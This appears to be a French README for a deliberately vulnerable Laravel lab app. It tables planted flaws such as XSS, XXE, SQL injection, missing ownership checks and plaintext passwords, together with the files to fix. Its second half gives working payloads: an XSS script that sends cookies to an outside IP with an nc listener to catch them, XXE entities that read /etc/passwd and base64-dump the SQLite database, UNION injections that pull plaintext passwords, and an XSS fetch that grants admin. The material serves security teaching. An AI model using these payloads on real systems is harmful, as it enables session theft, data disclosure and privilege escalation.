# La liste des vulnérabilités
Vulnérabilité|Cause|Danger|Pages à corriger/Fonction à implanter
---|---|---|---
Le nom des listes est susceptible au XSS|Les pages utilisent `{!! !!}` au lieu de `{{ }}`|- Vol de cookies<br>- CSRF|`resources/views/listes/index.blade.php`
Les listes et items sont visibles par tous les usagers|L'identité du propriétaire n'est pas vérifié|- Consultation d'information privilégiée|`app/Http/Controllers/ItemsController.php`<br>`app/Http/Controllers/ListesControllers.php`
Les listes sont des ID numérique séquentiels|Utilisation du numéro automatique sous SQL|- Énumération facile de l'information|`app/Http/Controllers/ListesControllers.php`
Le flag `HttpOnly` n'est pas mis sur le cookie principal|Mauvaise configuration (`config/session.php` -- `'http_only' => false`)|- Vol de session|`config/session.php`
Les listes publiques peuvent être supprimées même si elles ne nous appartiennent pas|Aucune validation sur la route|- Suppression de données involontaire|`app/Http/Controllers/ListesControllers.php`
L'importation XML est vulnérable au XXE|Utilisation du module `SimpleXMLElement` avec l'option `LIBXML_NOENT`|- Inclusion de fichier appartenant au serveur|`app/Http/Controllers/ListesControllers.php`
La page de recherche est vulnérable à de l'injection SQL via un guillemet|Utilisation de `DB::raw`. Cette fonction est insécure.|- Divulgation de la base de données|`app/Http/Controllers/SearchController.php`
Le site est en mode DEBUG|La variable `APP_DEBUG` est mise à `true` dans le fichier `.env`|- Divulgation d'information secrètes (mots de passe, API_KEY, etc.)<br>- Affichage des messages d'erreurs contenant de l'information privilégiées (dossier où est sockée l'application par exemple)|`.env`
Les mots de passes sont stockés en texte clair dans la base de données|Mauvaise programmation|- Possibilité de vol d'identité<br>- Possibilité de vol d'autres comptes sur d'autres sites web|`app/Http/Controllers/Auth/RegisteredUserController.php`
Un non-admin peut devenir admin en utilisant du XSS spécialement conçu, tout en passant le token CSRF|Pages vulnérables au XSS|

# Commandes utiles
## Vol de cookie rapide
1. Créer une liste avec ce nom
```
Liste "ordinaire"<script>var http = new XMLHttpRequest();http.open('GET', 'http://192.168.1.104:9999/cookie=' + document.cookie);http.send();</script>
```
2. Lancer cette commande et attendre
```bash
$ while true; do nc -lvnp 9999 | grep --line-buffered 'cookie' | awk -F= '{print $4}'; done
```

## XXE
Lire un fichier texte
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>
    <liste>XXE</liste>
    <items>
        <item qte="1">&example;</item>
    </items>
</data>
```
Lire un fichier binaire (merci à @EricHogue)
```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/app/database/database.sqlite"> ]>
<data>
    <liste>XSS</liste>
    <items>
        <item qte="1">&example;</item>
    </items>
</data>
```

## Injection SQL
### Obtenir les autres tables
```sql
zzzzzzzzzzzzzzzzzz" union select 1,name,tbl_name,sql from sqlite_master where "1"="1" or "2"="2
```
### Obtenir les usagers
```sql
zzzzzzzzzzzzzzzzzz" union select 1, name, email, plain_text_password from users where "1"="1" or "2"="2
```

## Augmentation de privilèges avec XSS
Le code suivant entré en XSS dans une liste publique ajoutera l'usager numéro 2 comme admin
```javascript
token = document.getElementsByName('_token')[0].value

fetch('/admin/', {
    method: 'POST',
    body: `_token=${token}&userid=2&admin=1`,
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
});
```
